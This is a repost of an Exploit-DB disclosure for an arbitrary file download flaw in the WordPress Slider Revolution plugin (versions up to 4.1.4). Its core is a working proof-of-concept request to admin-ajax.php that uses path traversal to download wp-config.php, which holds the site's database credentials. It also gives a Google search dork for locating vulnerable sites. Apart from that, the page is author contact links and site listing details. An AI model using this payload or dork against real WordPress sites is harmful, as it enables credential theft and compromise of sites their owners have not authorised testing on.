WordPress Plugin Slider REvolution 4.1.4 – Arbitrary File Download

• Exploit Database
• 120 阅读

• 作者： Claudio Viviani
  日期： 2015-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36554/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability   # Exploit Author : Claudio Viviani   # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380   # Software Link : Premium plugin   # Dork Google: revslider.php "index of"   # Date : 2014-07-24   # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox     ######################   # Description   Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability     ######################   # PoC   http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php     #####################   Discovered By : Claudio Viviani   http://www.homelab.it info@homelab.it homelabit@protonmail.ch   https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww   #####################